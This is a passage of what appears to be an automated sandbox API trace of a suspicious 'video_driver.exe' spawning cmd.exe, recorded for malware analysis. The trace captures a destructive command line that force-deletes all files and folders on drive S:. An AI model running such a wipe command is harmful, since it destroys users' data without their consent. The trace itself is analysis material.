"Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0xb30 [0068.853] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x41f904 | out: lpSystemTimeAsFileTime=0x41f904*(dwLowDateTime=0x6da3520, dwHighDateTime=0x1d62400)) [0068.853] GetCurrentProcessId () returned 0x788 [0068.853] GetCurrentThreadId () returned 0xb30 [0068.853] GetTickCount () returned 0x1148a17 [0068.853] QueryPerformanceCounter (in: lpPerformanceCount=0x41f8fc | out: lpPerformanceCount=0x41f8fc*=18898663680) returned 1 [0068.855] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.855] __set_app_type (_Type=0x1) [0068.855] __p__fmode () returned 0x770331f4 [0068.855] __p__commode () returned 0x770331fc [0068.855] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.855] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.856] GetCurrentThreadId () returned 0xb30 [0068.856] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb30) returned 0x60 [0068.856] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.856] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.856] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.857] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x41f894 | out: phkResult=0x41f894*=0x0) returned 0x2 [0068.857] VirtualQuery (in: lpAddress=0x41f8cb, lpBuffer=0x41f864, dwLength=0x1c | out: lpBuffer=0x41f864*(BaseAddress=0x41f000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.857] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x41f864, dwLength=0x1c | out: lpBuffer=0x41f864*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.857] VirtualQuery (in: lpAddress=0x321000, lpBuffer=0x41f864, dwLength=0x1c | out: lpBuffer=0x41f864*(BaseAddress=0x321000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.857] VirtualQuery (in: lpAddress=0x323000, lpBuffer=0x41f864, dwLength=0x1c | out: lpBuffer=0x41f864*(BaseAddress=0x323000, AllocationBase=0x320000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.857] VirtualQuery (in: lpAddress=0x420000, lpBuffer=0x41f864, dwLength=0x1c | out: lpBuffer=0x41f864*(BaseAddress=0x420000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.857] GetConsoleOutputCP () returned 0x1b5 [0068.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.858] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.858] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.858] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.859] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.859] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.859] GetEnvironmentStringsW () returned 0x6d20f8* [0068.859] GetProcessHeap () returned 0x6c0000 [0068.859] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xaca) returned 0x6d2bd0 [0068.859] FreeEnvironmentStringsW (penv=0x6d20f8) returned 1 [0068.860] GetProcessHeap () returned 0x6c0000 [0068.860] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x4) returned 0x6d1898 [0068.860] GetEnvironmentStringsW () returned 0x6d20f8* [0068.860] GetProcessHeap () returned 0x6c0000 [0068.860] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xaca) returned 0x6d36a8 [0068.860] FreeEnvironmentStringsW (penv=0x6d20f8) returned 1 [0068.860] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41e804 | out: phkResult=0x41e804*=0x68) returned 0x0 [0068.860] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x0, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.860] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x1, lpcbData=0x41e808*=0x4) returned 0x0 [0068.860] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x1, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.860] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x0, lpcbData=0x41e808*=0x4) returned 0x0 [0068.860] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x40, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x40, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x40, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.861] RegCloseKey (hKey=0x68) returned 0x0 [0068.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x41e804 | out: phkResult=0x41e804*=0x68) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x40, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x1, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x1, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x0, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x9, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x4, lpData=0x41e810*=0x9, lpcbData=0x41e808*=0x4) returned 0x0 [0068.861] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x41e80c, lpData=0x41e810, lpcbData=0x41e808*=0x1000 | out: lpType=0x41e80c*=0x0, lpData=0x41e810*=0x9, lpcbData=0x41e808*=0x1000) returned 0x2 [0068.861] RegCloseKey (hKey=0x68) returned 0x0 [0068.861] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.861] srand (_Seed=0x5eb34b6e) [0068.861] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" [0068.861] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" [0068.862] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.862] GetProcessHeap () returned 0x6c0000 [0068.862] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x210) returned 0x6d20f8 [0068.862] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.862] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.862] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.862] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.862] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.862] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.862] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.863] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.863] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.863] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.863] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.863] GetProcessHeap () returned 0x6c0000 [0068.863] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d2bd0 | out: hHeap=0x6c0000) returned 1 [0068.863] GetEnvironmentStringsW () returned 0x6d2310* [0068.863] GetProcessHeap () returned 0x6c0000 [0068.863] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xae2) returned 0x6d4c70 [0068.863] FreeEnvironmentStringsW (penv=0x6d2310) returned 1 [0068.863] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.863] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.863] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.863] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.863] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.863] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.863] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.864] GetProcessHeap () returned 0x6c0000 [0068.864] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x54) returned 0x6d17c8 [0068.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x41f5d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x41f5d0, lpFilePart=0x41f5cc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x41f5cc*="Desktop") returned 0x25 [0068.864] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.864] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x41f34c | out: lpFindFileData=0x41f34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6d5760 [0068.864] FindClose (in: hFindFile=0x6d5760 | out: hFindFile=0x6d5760) returned 1 [0068.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x41f34c | out: lpFindFileData=0x41f34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6d5760 [0068.864] FindClose (in: hFindFile=0x6d5760 | out: hFindFile=0x6d5760) returned 1 [0068.865] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x41f34c | out: lpFindFileData=0x41f34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6d5760 [0068.865] FindClose (in: hFindFile=0x6d5760 | out: hFindFile=0x6d5760) returned 1 [0068.865] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.865] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.865] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.865] GetProcessHeap () returned 0x6c0000 [0068.865] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d4c70 | out: hHeap=0x6c0000) returned 1 [0068.865] GetEnvironmentStringsW () returned 0x6d4180* [0068.865] GetProcessHeap () returned 0x6c0000 [0068.865] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb36) returned 0x6d5fa0 [0068.865] FreeEnvironmentStringsW (penv=0x6d4180) returned 1 [0068.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.866] GetProcessHeap () returned 0x6c0000 [0068.866] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d17c8 | out: hHeap=0x6c0000) returned 1 [0068.866] GetProcessHeap () returned 0x6c0000 [0068.866] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400e) returned 0x6d6ae0 [0068.866] GetProcessHeap () returned 0x6c0000 [0068.866] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa0) returned 0x6d2e50 [0068.866] GetProcessHeap () returned 0x6c0000 [0068.866] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d6ae0 | out: hHeap=0x6c0000) returned 1 [0068.866] GetConsoleOutputCP () returned 0x1b5 [0068.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.866] GetUserDefaultLCID () returned 0x409 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x41f710, cchData=128 | out: lpLCData="0") returned 2 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x41f710, cchData=128 | out: lpLCData="0") returned 2 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x41f710, cchData=128 | out: lpLCData="1") returned 2 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.868] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.869] GetProcessHeap () returned 0x6c0000 [0068.869] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x20c) returned 0x6d2ef8 [0068.869] GetConsoleTitleW (in: lpConsoleTitle=0x6d2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.869] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.869] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.870] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.870] GetProcessHeap () returned 0x6c0000 [0068.870] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400a) returned 0x6d6ae0 [0068.870] GetProcessHeap () returned 0x6c0000 [0068.870] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x4008) returned 0x6daaf8 [0068.871] GetProcessHeap () returned 0x6c0000 [0068.871] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x1a) returned 0x6d57e0 [0068.871] GetEnvironmentVariableW (in: lpName="p IN (\"S", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="CD") returned 13 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="ERRORLEVEL") returned 11 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="CMDEXTVERSION") returned 13 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="CMDCMDLINE") returned 13 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="DATE") returned 12 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="TIME") returned -4 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="RANDOM") returned -2 [0068.871] _wcsicmp (_String1="p IN (\"S", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.871] GetProcessHeap () returned 0x6c0000 [0068.871] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d57e0 | out: hHeap=0x6c0000) returned 1 [0068.871] GetProcessHeap () returned 0x6c0000 [0068.871] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6daaf8 | out: hHeap=0x6c0000) returned 1 [0068.871] GetProcessHeap () returned 0x6c0000 [0068.871] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x4008) returned 0x6daaf8 [0068.871] GetProcessHeap () returned 0x6c0000 [0068.871] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6daaf8 | out: hHeap=0x6c0000) returned 1 [0068.872] GetProcessHeap () returned 0x6c0000 [0068.872] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d6ae0 | out: hHeap=0x6c0000) returned 1 [0068.872] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.872] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.872] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.872] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.872] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.872] GetProcessHeap () returned 0x6c0000 [0068.872] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d3110 [0068.872] GetProcessHeap () returned 0x6c0000 [0068.872] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xe) returned 0x6cffc0 [0068.873] GetProcessHeap () returned 0x6c0000 [0068.873] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x20) returned 0x6d57e0 [0068.873] GetProcessHeap () returned 0x6c0000 [0068.873] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d57e0, Size=0x16) returned 0x6d1800 [0068.873] GetProcessHeap () returned 0x6c0000 [0068.873] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d1800) returned 0x16 [0068.873] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.874] GetProcessHeap () returned 0x6c0000 [0068.874] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d3170 [0068.874] GetProcessHeap () returned 0x6c0000 [0068.874] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x14) returned 0x6d31d0 [0068.874] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.874] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.875] GetProcessHeap () returned 0x6c0000 [0068.875] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x12) returned 0x6d31f0 [0068.875] GetProcessHeap () returned 0x6c0000 [0068.875] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x1c) returned 0x6d57e0 [0068.875] GetProcessHeap () returned 0x6c0000 [0068.875] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d57e0, Size=0x14) returned 0x6d3210 [0068.875] GetProcessHeap () returned 0x6c0000 [0068.875] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d3210) returned 0x14 [0068.875] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.875] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.875] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.875] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.875] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.875] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.875] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.875] GetProcessHeap () returned 0x6c0000 [0068.875] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d3230 [0068.876] GetProcessHeap () returned 0x6c0000 [0068.876] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x10) returned 0x6cffd8 [0068.876] GetProcessHeap () returned 0x6c0000 [0068.876] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x28) returned 0x6d3290 [0068.877] GetProcessHeap () returned 0x6c0000 [0068.877] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d32c0 [0068.877] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.877] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.877] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.877] GetProcessHeap () returned 0x6c0000 [0068.877] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d3320 [0068.877] GetProcessHeap () returned 0x6c0000 [0068.878] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x44) returned 0x6d3380 [0068.878] GetProcessHeap () returned 0x6c0000 [0068.878] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x14) returned 0x6d33d0 [0068.878] GetProcessHeap () returned 0x6c0000 [0068.878] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d33d0, Size=0x12) returned 0x6d33d0 [0068.878] GetProcessHeap () returned 0x6c0000 [0068.878] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d33d0) returned 0x12 [0068.878] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.878] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.879] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.879] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.879] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.879] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.879] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.880] GetProcessHeap () returned 0x6c0000 [0068.880] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x12) returned 0x6d33f0 [0068.880] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.881] _wcsicmp 